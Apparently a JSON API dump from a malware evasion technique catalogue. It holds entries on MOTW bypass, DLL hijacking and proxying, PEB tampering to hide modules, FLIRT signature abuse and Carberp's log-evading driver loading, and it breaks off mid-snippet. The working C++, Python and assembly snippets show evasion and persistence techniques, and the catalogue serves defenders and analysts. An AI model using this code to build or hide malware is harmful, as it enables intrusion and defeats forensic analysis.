GET /api/techniques/
HTTP 200 OK
Allow: GET, POST, HEAD, OPTIONS
Content-Type: application/json
Vary: Accept

{
    "count": 205,
    "next": "https://unprotect.it/api/techniques/?page=2",
    "previous": null,
    "results": [
        {
            "id": 222,
            "unprotect_id": "U0517",
            "name": "Mark-Of-The-Web (MOTW) Bypass",
            "categories": [
                {
                    "id": 2,
                    "key": "antivirus-evasion",
                    "label": "Antivirus Evasion"
                }
            ],
            "description": "Mark-of-the-Web (MOTW) is a security feature originally introduced by Internet Explorer. When downloading a file, Internet Explorer creates an ADS named Zone.Identifier and adds a ZoneId to this stream to indicate from which zone the file originates. It is used on Windows OS to trigger a Windows Defender SmartScreen detection and raise an alert to the user about the file.\r\n\r\nThe following ZoneId values may be used in a Zone.Identifier ADS:\r\n\r\n* 0 Local computer\r\n* 1 Local intranet\r\n* 2 Trusted sites\r\n* 3 Internet\r\n* 4 Restricted sites\r\n\r\nIn some cases, the Alternate Data Stream will be `SmartScreen` with the value `anaheim`. To bypass this security feature, malware authors can use a container format that does not propagate the MOTW to its contents, such as an ISO or VHD file.\r\n\r\nUsing `git clone` can also be an alternative, as a file cloned from GitHub with the Git client does not have a Zone.Identifier ADS.",
            "resources": "https://outflank.nl/blog/2020/03/30/mark-of-the-web-from-a-red-teams-perspective/\r\nhttps://www.trendmicro.com/en_us/research/22/j/black-basta-infiltrates-networks-via-qakbot-brute-ratel-and-coba.html",
            "tags": "#MOTW",
            "snippets": [],
            "detection_rules": []
        },
        {
            "id": 221,
            "unprotect_id": "U1241",
            "name": "Tamper DLL Export Names & GetProcAddress Spoofing",
            "categories": [
                {
                    "id": 4,
                    "key": "process-manipulating",
                    "label": "Process Manipulating"
                }
            ],
            "description": "When a process is running, it is possible to change the results of calls to the `GetProcAddress` API for the exported functions of a module, by modifying the export offsets and names at runtime.\r\n\r\nFor example, the offset of the `kernel32.dll` function `VirtualAlloc` can be changed to the offset of another function. When `VirtualAlloc` is called (after getting its address from `GetProcAddress`), the second function is called instead.\r\n\r\nTo achieve this, it is possible to use the WINAPI `MapAndLoad` from `ImageHlp.h`, then use `ImageDirectoryEntryToData` to get the list of exports. The `ImageRvaToVa` API can then be used to retrieve the offset of each exported function's name; if desired, the export name can be overwritten, causing calls to `GetProcAddress` with the original export name to fail or to be directed to another function.",
            "resources": "",
            "tags": "",
            "snippets": [
                {
                    "id": 122,
                    "language": {
                        "id": 2,
                        "label": "C++",
                        "code_class": "cpp"
                    },
                    "author": {
                        "id": 18,
                        "name": "Alex Schwarz",
                        "email": null,
                        "linkedin": "https://www.linkedin.com/in/alex-schwarz",
                        "twitter": null,
                        "website": null,
                        "github": null
                    },
                    "technique": "https://unprotect.it/api/techniques/221/",
                    "description": "",
                    "plain_code": "#pragma comment(linker,\"/export:FuncA=DLLExport.FunctionA,@1\")\r\n\r\n#include <iostream>\r\n#include <cstdio>\r\n#include <cstdlib>\r\n#include <cstring>\r\n#include <Windows.h>\r\n#include <ImageHlp.h>\r\n#pragma comment(lib, \"ImageHlp\")\r\n\r\nusing namespace std;\r\n\r\n// Rewrites the export name table entry of functionName in the loaded copy of dllName so that it reads newName.\r\n// The new name must not be longer than the original, because export names are packed back to back in the image.\r\nbool ModifyDLLExportName(string dllName, string functionName, string newName)\r\n{\r\n\tDWORD* dNameRVAs(0);\r\n\t_IMAGE_EXPORT_DIRECTORY* ImageExportDirectory;\r\n\tunsigned long cDirSize;\r\n\t_LOADED_IMAGE LoadedImage;\r\n\tstring sName;\r\n\r\n\tif (newName.size() > functionName.size())\r\n\t{\r\n\t\tprintf(\"New export name must not be longer than the original name\\n\");\r\n\t\treturn false;\r\n\t}\r\n\r\n\tif (MapAndLoad(dllName.c_str(), NULL, &LoadedImage, TRUE, TRUE))\r\n\t{\r\n\t\t// Locate the export directory in the file mapping, then walk its name table.\r\n\t\tImageExportDirectory = (_IMAGE_EXPORT_DIRECTORY*)ImageDirectoryEntryToData(LoadedImage.MappedAddress, false, IMAGE_DIRECTORY_ENTRY_EXPORT, &cDirSize);\r\n\r\n\t\tif (ImageExportDirectory != NULL)\r\n\t\t{\r\n\r\n\t\t\tdNameRVAs = (DWORD*)ImageRvaToVa(LoadedImage.FileHeader, LoadedImage.MappedAddress, ImageExportDirectory->AddressOfNames, NULL);\r\n\r\n\t\t\tfor (size_t i = 0; i < ImageExportDirectory->NumberOfNames; i++)\r\n\t\t\t{\r\n\t\t\t\tsName = (char*)ImageRvaToVa(LoadedImage.FileHeader, LoadedImage.MappedAddress, dNameRVAs[i], NULL);\r\n\r\n\t\t\t\tif (strcmp(functionName.c_str(), sName.c_str()) == 0)\r\n\t\t\t\t{\r\n\t\t\t\t\t// The name RVA read from the file mapping is applied to the module already loaded in this process.\r\n\t\t\t\t\tUINT64 funcName_Address = (UINT64)GetModuleHandleA(dllName.c_str()) + dNameRVAs[i];\r\n\r\n\t\t\t\t\tDWORD oldProt = 0;\r\n\r\n\t\t\t\t\tif (!VirtualProtect((LPVOID)funcName_Address, sName.size() + 1, PAGE_EXECUTE_READWRITE, &oldProt))\r\n\t\t\t\t\t{\r\n\t\t\t\t\t\tprintf(\"VirtualProtect failed: %lu\\n\", GetLastError());\r\n\t\t\t\t\t\tUnMapAndLoad(&LoadedImage);\r\n\t\t\t\t\t\treturn false;\r\n\t\t\t\t\t}\r\n\t\t\t\t\telse\r\n\t\t\t\t\t{\r\n\t\t\t\t\t\t// Bounded by the original name length so neighbouring export names are never overwritten.\r\n\t\t\t\t\t\tstrcpy_s((char*)funcName_Address, sName.size() + 1, newName.c_str());\r\n\t\t\t\t\t\tVirtualProtect((LPVOID)funcName_Address, sName.size() + 1, oldProt, &oldProt);\r\n\t\t\t\t\t\tprintf(\"Copied over export function name..\\n\");\r\n\t\t\t\t\t}\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t}\r\n\t\tUnMapAndLoad(&LoadedImage);\r\n\t}\r\n\r\n\treturn true;\r\n}\r\n\r\n\r\nint main(void)\r\n{\r\n\t//user-provided DLL Tests\r\n\tLoadLibraryA(\"DllExport.dll\");\r\n\r\n\tFARPROC addr_exe = GetProcAddress(GetModuleHandleA(\"ModifyExports.exe\"), \"FuncA\"); //using linker statement at top\r\n\tprintf(\"Addr: %p\\n\", addr_exe);\r\n\r\n\tFARPROC addr_dll = GetProcAddress(GetModuleHandleA(\"DllExport.dll\"), \"FunctionA\"); //returns same value as above line (address of DllExport.FunctionA)\r\n\tprintf(\"Addr: %p\\n\", addr_dll);\r\n\r\n\tModifyDLLExportName(\"DllExport.dll\", \"FunctionA\", \"FunctionB\");\r\n\tFARPROC addr_dll_B = GetProcAddress(GetModuleHandleA(\"DllExport.dll\"), \"FunctionB\"); //returns same value as above, thus looking up FunctionB gives us FunctionA.\r\n\tprintf(\"Addr: %p\\n\", addr_dll_B);\r\n\r\n\t//WINAPI Tests\r\n\r\n\tFARPROC addr = GetProcAddress(GetModuleHandleA(\"kernel32.dll\"), \"VirtualAlloc\"); //nothing has been modified yet, so this returns the real address of VirtualAlloc.\r\n\tprintf(\"Addr: %p\\n\", addr);\r\n\tModifyDLLExportName(\"kernel32.dll\", \"VirtualAlloc\", \"VirtualQuery\");\r\n\taddr = GetProcAddress(GetModuleHandleA(\"kernel32.dll\"), \"VirtualAlloc\"); //returns 0, as the line above changed the export's name.\r\n\tprintf(\"Addr: %p\\n\", addr);\r\n\taddr = GetProcAddress(GetModuleHandleA(\"kernel32.dll\"), \"VirtualQuery\"); //now returns the address of VirtualAlloc, not VirtualQuery!\r\n\tprintf(\"Addr: %p\\n\", addr);\r\n\tsystem(\"pause\");\r\n\treturn 0;\r\n}"
                }
            ],
            "detection_rules": []
        },
        {
            "id": 220,
            "unprotect_id": "T1574.001",
            "name": "DLL Search Order Hijacking",
            "categories": [
                {
                    "id": 10,
                    "key": "Defense-Evasion-Mitre",
                    "label": "Defense Evasion [Mitre]"
                }
            ],
            "description": "Adversaries may execute their own malicious payloads by hijacking the search order used to load DLLs. Windows systems use a common method to look for required DLLs to load into a program. \r\n\r\nHijacking DLL loads may be for the purpose of establishing persistence as well as elevating privileges and/or evading restrictions on file execution.",
            "resources": "https://attack.mitre.org/techniques/T1574/001/\r\nhttps://pentestlab.blog/2017/03/27/dll-hijacking/\r\nhttps://itm4n.github.io/windows-dll-hijacking-clarified/\r\nhttps://posts.specterops.io/automating-dll-hijack-discovery-81c4295904b0\r\nhttps://github.com/Sh0ckFR/DLLirant",
            "tags": "",
            "snippets": [
                {
                    "id": 120,
                    "language": {
                        "id": 2,
                        "label": "C++",
                        "code_class": "cpp"
                    },
                    "author": {
                        "id": 19,
                        "name": "Sh0ckFR",
                        "email": null,
                        "linkedin": "https://www.linkedin.com/in/yann-f/",
                        "twitter": "https://twitter.com/Sh0ckFR",
                        "website": "https://sh0ckfr.com",
                        "github": null
                    },
                    "technique": "https://unprotect.it/api/techniques/220/",
                    "description": "DLL Search Order Hijacking via the DnsFreeConfigStructure function exported by DNSAPI.dll, which is loaded by the executable nslookup.exe.",
                    "plain_code": "#include <windows.h>\r\n\r\n// Thread routine and payload: runs once the DLL has been loaded by the hijacked process.\r\nDWORD WINAPI Main(LPVOID lpParam) {\r\n    MessageBoxW(0, L\"DLL Search Order Hijacking is present\", L\"DLL Search Order Hijacking\", 0);\r\n    return 0;\r\n}\r\n\r\nBOOL APIENTRY DllMain(HMODULE hModule,\r\n    DWORD  ul_reason_for_call,\r\n    LPVOID lpReserved\r\n)\r\n{\r\n    switch (ul_reason_for_call)\r\n    {\r\n    case DLL_PROCESS_ATTACH:\r\n        // Run the payload on its own thread instead of doing work while the loader lock is held.\r\n        CreateThread(NULL, 0, Main, NULL, 0, NULL);\r\n        break;\r\n    case DLL_THREAD_ATTACH:\r\n    case DLL_THREAD_DETACH:\r\n    case DLL_PROCESS_DETACH:\r\n        break;\r\n    }\r\n    return TRUE;\r\n}\r\n\r\n// The export name nslookup.exe resolves from DNSAPI.dll; providing it lets the load succeed and also runs the payload when it is called.\r\n__declspec(dllexport) void DnsFreeConfigStructure() { Main(NULL); }"
                }
            ],
            "detection_rules": []
        },
        {
            "id": 219,
            "unprotect_id": "U1240",
            "name": "DLL Proxying",
            "categories": [
                {
                    "id": 4,
                    "key": "process-manipulating",
                    "label": "Process Manipulating"
                }
            ],
            "description": "In the context of malware, DLL proxying is a DLL hijacking technique where a legitimate DLL, say legit.dll, is renamed to legit1.dll and a malicious DLL, which exports all the same functions that legit1.dll exports (forwarding them to it), is put in its place as legit.dll.",
            "resources": "https://www.ired.team/offensive-security/persistence/dll-proxying-for-persistence\r\nhttps://itm4n.github.io/dll-proxying/\r\nhttps://github.com/Sh0ckFR/DLLirant",
            "tags": "",
            "snippets": [
                {
                    "id": 118,
                    "language": {
                        "id": 3,
                        "label": "Python",
                        "code_class": "python"
                    },
                    "author": {
                        "id": 19,
                        "name": "Sh0ckFR",
                        "email": null,
                        "linkedin": "https://www.linkedin.com/in/yann-f/",
                        "twitter": "https://twitter.com/Sh0ckFR",
                        "website": "https://sh0ckfr.com",
                        "github": null
                    },
                    "technique": "https://unprotect.it/api/techniques/219/",
                    "description": "Basic Python script that lists all exported functions of a target DLL (here DNSAPI.dll, used by nslookup.exe) as linker forwarding pragmas for the proxy DLL.",
                    "plain_code": "import pefile\r\n\r\n# Emit one linker pragma per named export so the proxy DLL forwards it to proxy.dll under the same name and ordinal.\r\nexported_functions = []\r\npe = pefile.PE('C:\\\\windows\\\\system32\\\\DNSAPI.dll')\r\nfor entry in pe.DIRECTORY_ENTRY_EXPORT.symbols:\r\n    if entry.name is None:\r\n        # Ordinal-only export: there is no name to forward.\r\n        continue\r\n    func = entry.name.decode('utf-8')\r\n    exported_functions.append(f'#pragma comment(linker,\"/export:{func}=proxy.{func},@{entry.ordinal}\")')\r\n\r\nexported_functions = '\\n'.join(exported_functions)\r\nprint(exported_functions)"
                },
                {
                    "id": 119,
                    "language": {
                        "id": 2,
                        "label": "C++",
                        "code_class": "cpp"
                    },
                    "author": {
                        "id": 19,
                        "name": "Sh0ckFR",
                        "email": null,
                        "linkedin": "https://www.linkedin.com/in/yann-f/",
                        "twitter": "https://twitter.com/Sh0ckFR",
                        "website": "https://sh0ckfr.com",
                        "github": null
                    },
                    "technique": "https://unprotect.it/api/techniques/219/",
                    "description": "DLL Proxying code via `DNSAPI.dll` on nslookup.exe. In this example, the original `DNSAPI.dll` file must be renamed to proxy.dll and the generated DLL must be named `DNSAPI.dll`.",
                    "plain_code": "#pragma once\r\n// One forwarding pragma per export of the original DLL (generated by the Python snippet above); the list is truncated here.\r\n#pragma comment(linker,\"/export:AdaptiveTimeout_ClearInterfaceSpecificConfiguration=proxy.AdaptiveTimeout_ClearInterfaceSpecificConfiguration,@1\")\r\n#pragma comment(linker,\"/export:AdaptiveTimeout_ResetAdaptiveTimeout=proxy.AdaptiveTimeout_ResetAdaptiveTimeout,@2\")\r\n#pragma comment(linker,\"/export:AddRefQueryBlobEx=proxy.AddRefQueryBlobEx,@3\")\r\n#pragma comment(linker,\"/export:BreakRecordsIntoBlob=proxy.BreakRecordsIntoBlob,@4\")\r\n#pragma comment(linker,\"/export:Coalesce_UpdateNetVersion=proxy.Coalesce_UpdateNetVersion,@5\")\r\n#pragma comment(linker,\"/export:CombineRecordsInBlob=proxy.CombineRecordsInBlob,@6\")\r\n#pragma comment(linker,\"/export:DeRefQueryBlobEx=proxy.DeRefQueryBlobEx,@7\")\r\n...\r\n\r\n#include <windows.h>\r\n\r\nint Main()\r\n{\r\n    // Your payload code.\r\n    return 0;\r\n}\r\n\r\nBOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpReserved)\r\n{\r\n    switch (fdwReason)\r\n    {\r\n    case DLL_PROCESS_ATTACH:\r\n        Main();\r\n        break;\r\n    case DLL_THREAD_ATTACH:\r\n        break;\r\n    case DLL_THREAD_DETACH:\r\n        break;\r\n    case DLL_PROCESS_DETACH:\r\n        break;\r\n    }\r\n    return TRUE;\r\n}"
                }
            ],
            "detection_rules": []
        },
        {
            "id": 218,
            "unprotect_id": "U1239",
            "name": "Change Module Base Address at Runtime",
            "categories": [
                {
                    "id": 4,
                    "key": "process-manipulating",
                    "label": "Process Manipulating"
                }
            ],
            "description": "It is possible to change the `DllBase` of a module at runtime. This can trick debugging and analysis tools such as IDA or Cheat Engine into thinking a module's base is actually at another address.\r\n\r\nThis is achieved through the `Ldr` member of the process PEB, whose `InMemoryOrderModuleList` can be iterated to get a list of the process's modules. Each iteration yields a `PLDR_DATA_TABLE_ENTRY` structure, which contains a member PVOID `DllBase` that can be overwritten with the new module base address.",
            "resources": "",
            "tags": "",
            "snippets": [
                {
                    "id": 117,
                    "language": {
                        "id": 2,
                        "label": "C++",
                        "code_class": "cpp"
                    },
                    "author": {
                        "id": 18,
                        "name": "Alex Schwarz",
                        "email": null,
                        "linkedin": "https://www.linkedin.com/in/alex-schwarz",
                        "twitter": null,
                        "website": null,
                        "github": null
                    },
                    "technique": "https://unprotect.it/api/techniques/218/",
                    "description": "",
                    "plain_code": "#include <Windows.h>\r\n#include <Winternl.h>\r\n#include <stdint.h>\r\n\r\nbool ChangeModuleDllBase(const wchar_t* szModule, uint64_t newAddress)\r\n{\r\n\tPPEB PEB = (PPEB)__readgsqword(0x60);\r\n\t_LIST_ENTRY* f = PEB->Ldr->InMemoryOrderModuleList.Flink;\r\n\tbool Found = FALSE;\r\n\tint count = 0;\r\n\r\n\twhile (!Found && count < 256)\r\n\t{\r\n\t\tPLDR_DATA_TABLE_ENTRY dataEntry = CONTAINING_RECORD(f, LDR_DATA_TABLE_ENTRY, InMemoryOrderLinks);\r\n\r\n\t\tif (wcsstr(dataEntry->FullDllName.Buffer, szModule))\r\n\t\t{\r\n\t\t\tdataEntry->DllBase = (PVOID)newAddress;\r\n\t\t\tFound = TRUE;\r\n\t\t\treturn true;\r\n\t\t}\r\n\r\n\t\tf = dataEntry->InMemoryOrderLinks.Flink;\r\n\t\tcount++;\r\n\t}\r\n\r\n\treturn false;\r\n}\r\n\r\nint main()\r\n{\r\n    ChangeModuleDllBase(L\"YourProgram.exe\", 0x123456789);\r\n    return 0;\r\n}"
                }
            ],
            "detection_rules": []
        },
        {
            "id": 217,
            "unprotect_id": "U1238",
            "name": "Change Module Name at Runtime",
            "categories": [
                {
                    "id": 4,
                    "key": "process-manipulating",
                    "label": "Process Manipulating"
                }
            ],
            "description": "It is possible to change the name of the current process or any of its modules at runtime. This is achieved through the `Ldr` member of the process PEB, whose `InMemoryOrderModuleList` can be iterated to get a list of the process's modules.\r\n\r\nEach iteration yields a `PLDR_DATA_TABLE_ENTRY` structure, which contains a member `UNICODE_STRING FullDllName` that can be overwritten with the new module name.",
            "resources": "",
            "tags": "",
            "snippets": [
                {
                    "id": 116,
                    "language": {
                        "id": 2,
                        "label": "C++",
                        "code_class": "cpp"
                    },
                    "author": {
                        "id": 18,
                        "name": "Alex Schwarz",
                        "email": null,
                        "linkedin": "https://www.linkedin.com/in/alex-schwarz",
                        "twitter": null,
                        "website": null,
                        "github": null
                    },
                    "technique": "https://unprotect.it/api/techniques/217/",
                    "description": "",
                    "plain_code": "// changeModuleNameRuntime.cpp : This file contains the 'main' function. Program execution begins and ends there.\r\n#define _CRT_SECURE_NO_WARNINGS\r\n\r\n#include <iostream>\r\n#include <Windows.h>\r\n#include <Winternl.h>\r\n\r\n// Expanded PEB layout kept for reference; the code below uses the PEB definition from Winternl.h.\r\ntypedef struct _MYPEB {\r\n\tUCHAR InheritedAddressSpace;\r\n\tUCHAR ReadImageFileExecOptions;\r\n\tUCHAR BeingDebugged;\r\n\tUCHAR Spare;\r\n\tPVOID Mutant;\r\n\tPVOID ImageBaseAddress;\r\n\tPEB_LDR_DATA* Ldr;\r\n\tPRTL_USER_PROCESS_PARAMETERS ProcessParameters;\r\n\tPVOID SubSystemData;\r\n\tPVOID ProcessHeap;\r\n\tPVOID FastPebLock;\r\n\tPVOID FastPebLockRoutine;\r\n\tPVOID FastPebUnlockRoutine;\r\n\tULONG EnvironmentUpdateCount;\r\n\tPVOID* KernelCallbackTable;\r\n\tPVOID EventLogSection;\r\n\tPVOID EventLog;\r\n\tPVOID FreeList;\r\n\tULONG TlsExpansionCounter;\r\n\tPVOID TlsBitmap;\r\n\tULONG TlsBitmapBits[0x2];\r\n\tPVOID ReadOnlySharedMemoryBase;\r\n\tPVOID ReadOnlySharedMemoryHeap;\r\n\tPVOID* ReadOnlyStaticServerData;\r\n\tPVOID AnsiCodePageData;\r\n\tPVOID OemCodePageData;\r\n\tPVOID UnicodeCaseTableData;\r\n\tULONG NumberOfProcessors;\r\n\tULONG NtGlobalFlag;\r\n\tUCHAR Spare2[0x4];\r\n\tULARGE_INTEGER CriticalSectionTimeout;\r\n\tULONG HeapSegmentReserve;\r\n\tULONG HeapSegmentCommit;\r\n\tULONG HeapDeCommitTotalFreeThreshold;\r\n\tULONG HeapDeCommitFreeBlockThreshold;\r\n\tULONG NumberOfHeaps;\r\n\tULONG MaximumNumberOfHeaps;\r\n\tPVOID** ProcessHeaps;\r\n\tPVOID GdiSharedHandleTable;\r\n\tPVOID ProcessStarterHelper; //PPS_POST_PREOCESS_INIT_ROUTINE?\r\n\tPVOID GdiDCAttributeList;\r\n\tPVOID LoaderLock;\r\n\tULONG OSMajorVersion;\r\n\tULONG OSMinorVersion;\r\n\tULONG OSBuildNumber;\r\n\tULONG OSPlatformId;\r\n\tULONG ImageSubSystem;\r\n\tULONG ImageSubSystemMajorVersion;\r\n\tULONG ImageSubSystemMinorVersion;\r\n\tULONG GdiHandleBuffer[0x22];\r\n\tPVOID ProcessWindowStation;\r\n} MYPEB, * PMYPEB;\r\n\r\nvoid ChangeModuleName(wchar_t* szModule, wchar_t* newName)\r\n{\r\n\tPPEB PEB = (PPEB)__readgsqword(0x60); // x64 only: the PEB pointer is stored at gs:[0x60]\r\n\t_LIST_ENTRY* head = &PEB->Ldr->InMemoryOrderModuleList;\r\n\t_LIST_ENTRY* f = head->Flink;\r\n\r\n\t// The module list is circular: stop when we are back at the head instead of looping forever.\r\n\twhile (f != head)\r\n\t{\r\n\t\tPLDR_DATA_TABLE_ENTRY dataEntry = CONTAINING_RECORD(f, LDR_DATA_TABLE_ENTRY, InMemoryOrderLinks);\r\n\r\n\t\tif (wcsstr(dataEntry->FullDllName.Buffer, szModule) != NULL)\r\n\t\t{\r\n\t\t\t// FullDllName is a counted UNICODE_STRING: never write past its MaximumLength.\r\n\t\t\tsize_t maxChars = dataEntry->FullDllName.MaximumLength / sizeof(wchar_t);\r\n\t\t\tif (wcslen(newName) + 1 > maxChars)\r\n\t\t\t\treturn;\r\n\t\t\twcscpy(dataEntry->FullDllName.Buffer, newName);\r\n\t\t\tdataEntry->FullDllName.Length = (USHORT)(wcslen(newName) * sizeof(wchar_t));\r\n\t\t\treturn;\r\n\t\t}\r\n\r\n\t\tf = dataEntry->InMemoryOrderLinks.Flink;\r\n\t}\r\n}\r\n\r\nint main()\r\n{\r\n\tChangeModuleName((wchar_t*)L\"myApplication.exe\", (wchar_t*)L\"NEW_MODULE_NAME\"); //you can also change to a module name with no file extension if you want to hide your module\r\n\treturn 0;\r\n}"
                }
            ],
            "detection_rules": []
        },
        {
            "id": 216,
            "unprotect_id": "U0220",
            "name": "FLIRT Signatures Evasion",
            "categories": [
                {
                    "id": 5,
                    "key": "anti-disassembly",
                    "label": "Anti-Disassembly"
                }
            ],
            "description": "FLIRT (Fast Library Identification and Recognition Technology) is a database of byte patterns (signatures) used to identify known functions from legitimate libraries.\r\n\r\nMalware can abuse known FLIRT signatures by replacing or adding specific bytes to hide malicious code inside a function that would be recognised as coming from a legitimate library.\r\n\r\nThis technique will mislead the reverse engineering process if FLIRT signatures are trusted without further analysis.",
            "resources": "https://hex-rays.com/products/ida/tech/flirt/in_depth/\r\nhttps://github.com/Maktm/FLIRTDB\r\nhttps://www.virustotal.com/gui/file/a41ba65405a032f4450ba80882cdd01d715d9d1684f4204050566be29a6dedb0",
            "tags": "flirt",
            "snippets": [
                {
                    "id": 115,
                    "language": {
                        "id": 5,
                        "label": "Assembly",
                        "code_class": "x86asm"
                    },
                    "author": {
                        "id": 9,
                        "name": "Lexsek",
                        "email": null,
                        "linkedin": null,
                        "twitter": "https://twitter.com/Lexsek_",
                        "website": null,
                        "github": null
                    },
                    "technique": "https://unprotect.it/api/techniques/216/",
                    "description": "The malicious sample listed below abused the variable bytes of the __IsNonwritableInCurrentImage signature to add two instructions implementing the anti-debugging technique referenced as [U0114](https://unprotect.it/technique/closehandle-ntclose/) on Unprotect.\r\n\r\nSHA256: a41ba65405a032f4450ba80882cdd01d715d9d1684f4204050566be29a6dedb0",
                    "plain_code": "// Malicious code\r\n.text:00A4264A                 push    0DEADBEEFh\r\n.text:00A4264F                 call    kernel32_CloseHandle\r\n\r\n// Full abused function tagged as __IsNonwritableInCurrentImage.\r\n.text:00A42610 __IsNonwritableInCurrentImage proc near ; CODE XREF: sub_A428D0:loc_A429E2↓p\r\n.text:00A42610\r\n.text:00A42610                 ms_exc          = CPPEH_RECORD ptr -18h\r\n.text:00A42610\r\n.text:00A42610 ; __unwind { // __except_handler4\r\n.text:00A42610                 push    ebp\r\n.text:00A42611                 mov     ebp, esp\r\n.text:00A42613                 push    0FFFFFFFEh\r\n.text:00A42615                 push    offset stru_A5AE98\r\n.text:00A4261A                 push    offset __except_handler4\r\n.text:00A4261F                 mov     eax, large fs:0\r\n.text:00A42625                 push    eax\r\n.text:00A42626                 sub     esp, 8\r\n.text:00A42629                 push    ebx\r\n.text:00A4262A                 push    esi\r\n.text:00A4262B                 push    edi\r\n.text:00A4262C                 mov     eax, ___security_cookie\r\n.text:00A42631                 xor     [ebp+ms_exc.registration.ScopeTable], eax\r\n.text:00A42634                 xor     eax, ebp\r\n.text:00A42636                 push    eax\r\n.text:00A42637                 lea     eax, [ebp+ms_exc.registration]\r\n.text:00A4263A                 mov     large fs:0, eax\r\n.text:00A42640                 mov     [ebp+ms_exc.old_esp], esp\r\n.text:00A42643 ;   __try { // __except at loc_A42676\r\n.text:00A42643                 mov     [ebp+ms_exc.registration.TryLevel], 0\r\n.text:00A4264A                 push    0DEADBEEFh\r\n.text:00A4264F                 call    kernel32_CloseHandle\r\n.text:00A4264F ;   } // starts at A42643\r\n.text:00A42655                 mov     [ebp+ms_exc.registration.TryLevel], 0FFFFFFFEh\r\n.text:00A4265C                 xor     eax, eax\r\n.text:00A4265E                 mov     ecx, [ebp+ms_exc.registration.Next]\r\n.text:00A42661                 mov     large fs:0, ecx\r\n.text:00A42668                 pop     ecx\r\n.text:00A42669                 pop     edi\r\n.text:00A4266A                 pop     esi\r\n.text:00A4266B                 pop     ebx\r\n.text:00A4266C                 mov     esp, ebp\r\n.text:00A4266E                 pop     ebp\r\n.text:00A4266F                 retn\r\n.text:00A42670 ; ---------------------------------------------------------------------------\r\n.text:00A42670\r\n.text:00A42670 loc_A42670:                             ; DATA XREF: .rdata:stru_A5AE98↓o\r\n.text:00A42670 ;   __except filter // owned by A42643\r\n.text:00A42670                 mov     eax, 1\r\n.text:00A42675                 retn\r\n.text:00A42676 ; ---------------------------------------------------------------------------\r\n.text:00A42676\r\n.text:00A42676 loc_A42676:                             ; DATA XREF: .rdata:stru_A5AE98↓o\r\n.text:00A42676 ;   __except(loc_A42670) // owned by A42643\r\n.text:00A42676                 mov     esp, [ebp+ms_exc.old_esp]\r\n.text:00A42679                 mov     [ebp+ms_exc.registration.TryLevel], 0FFFFFFFEh\r\n.text:00A42680                 mov     eax, 2000h\r\n.text:00A42685                 mov     ecx, [ebp+ms_exc.registration.Next]\r\n.text:00A42688                 mov     large fs:0, ecx\r\n.text:00A4268F                 pop     ecx\r\n.text:00A42690                 pop     edi\r\n.text:00A42691                 pop     esi\r\n.text:00A42692                 pop     ebx\r\n.text:00A42693                 mov     esp, ebp\r\n.text:00A42695                 pop     ebp\r\n.text:00A42696                 retn\r\n.text:00A42696 ; } // starts at A42610\r\n.text:00A42696 __IsNonwritableInCurrentImage endp"
                }
            ],
            "detection_rules": []
        },
        {
            "id": 215,
            "unprotect_id": "U0307",
            "name": "Windows Event Log Evasion via Native APIs",
            "categories": [
                {
                    "id": 8,
                    "key": "anti-forensic",
                    "label": "Anti-Forensic"
                }
            ],
            "description": "Attackers can leverage native Windows API calls to install malicious services without generating the correlating entries in the event log. Using native APIs to install services instead of the standard API calls allows attackers to bypass security controls and event logging. This technique was utilised by Stuxnet.\r\n\r\nServices are typically created through the standard Windows API call `CreateServiceA` or `CreateService`. This API is also called by the native Windows service-creation tool “sc.exe” to register a service on a machine. A call to this API subsequently generates entries in the event log corresponding to the service creation event IDs.\r\n\r\nAttackers can create services without relying on the typical `CreateServiceA` call by interacting with the lower-level native APIs directly. For example, the `StartService` API makes a call to the native API `NdrClientCall2` and also registers the service start events in the event logs.\r\n\r\nBy directly calling `NdrClientCall2` to start a service whose registry keys have been created manually, the service is started and running, and no event log entries are created, which evades forensic analysis. The result is a malicious service running without any event log entry.\r\n\r\nTo take this a step further, attackers can remove the evidence in the registry and any correlating evidence loaded in the memory of “services.exe”. This leaves no registry artefacts and no event log information to analyse.",
            "resources": "https://www.inversecos.com/2022/03/windows-event-log-evasion-via-native.html",
            "tags": "stuxnet,antiforensic",
            "snippets": [
                {
                    "id": 114,
                    "language": {
                        "id": 2,
                        "label": "C++",
                        "code_class": "cpp"
                    },
                    "author": {
                        "id": 16,
                        "name": "External",
                        "email": null,
                        "linkedin": null,
                        "twitter": null,
                        "website": null,
                        "github": null
                    },
                    "technique": "https://unprotect.it/api/techniques/215/",
                    "description": "NtLoadDriver technique used by the Carberp malware.",
                    "plain_code": "VOID StartSys(LPCSTR chSysPath)\r\n{\r\n\tNTSTATUS St;\r\n\tBOOL bRet = FALSE;\r\n\tHKEY hKey;\r\n\tCHAR chRegPath[MAX_PATH];\r\n\tWCHAR wcLoadDrv[MAX_PATH];\r\n\tCHAR chImagePath[MAX_PATH] = \"\\\\??\\\\\";\r\n\tUNICODE_STRING usStr;\r\n\tDWORD dwType;\r\n\r\n\tGetPrivilege(SE_LOAD_DRIVER_PRIVILEGE);\r\n\r\n\tDbgPrint(__FUNCTION__\"(): driver path '%s'\\n\",chSysPath);\r\n\r\n\tDWORD dwId = GetTickCount();\r\n\r\n\t// The service key is named after the tick count, so it never matches a registered service name.\r\n\t_snprintf(chRegPath,RTL_NUMBER_OF(chRegPath)-1,\"system\\\\currentcontrolset\\\\services\\\\%x\", dwId);\r\n\t_snwprintf(wcLoadDrv,RTL_NUMBER_OF(wcLoadDrv)-1,L\"\\\\registry\\\\machine\\\\system\\\\currentcontrolset\\\\services\\\\%x\", dwId);\r\n\r\n\t// strncat's count is the number of characters to append, not the buffer size: leave room for the prefix and the terminator.\r\n\tstrncat(chImagePath,chSysPath,sizeof(chImagePath)-strlen(chImagePath)-1);\r\n\tif (RegCreateKey(HKEY_LOCAL_MACHINE,chRegPath,&hKey) == ERROR_SUCCESS)\r\n\t{\r\n\t\tRegSetValueEx(hKey,\"ImagePath\",0,REG_SZ,(LPBYTE)&chImagePath,strlen(chImagePath)+1);\r\n\r\n\t\tdwType = SERVICE_KERNEL_DRIVER;\r\n\t\tRegSetValueEx(hKey,\"Type\",0,REG_DWORD,(LPBYTE)&dwType,sizeof(DWORD));\r\n\r\n\t\tdwType = SERVICE_DEMAND_START;\r\n\t\tRegSetValueEx(hKey,\"Start\",0,REG_DWORD,(LPBYTE)&dwType,sizeof(DWORD));\r\n\r\n\t\tRegCloseKey(hKey);\r\n\r\n\t\t// Load the driver straight through the native API; no Service Control Manager call, so no service event log 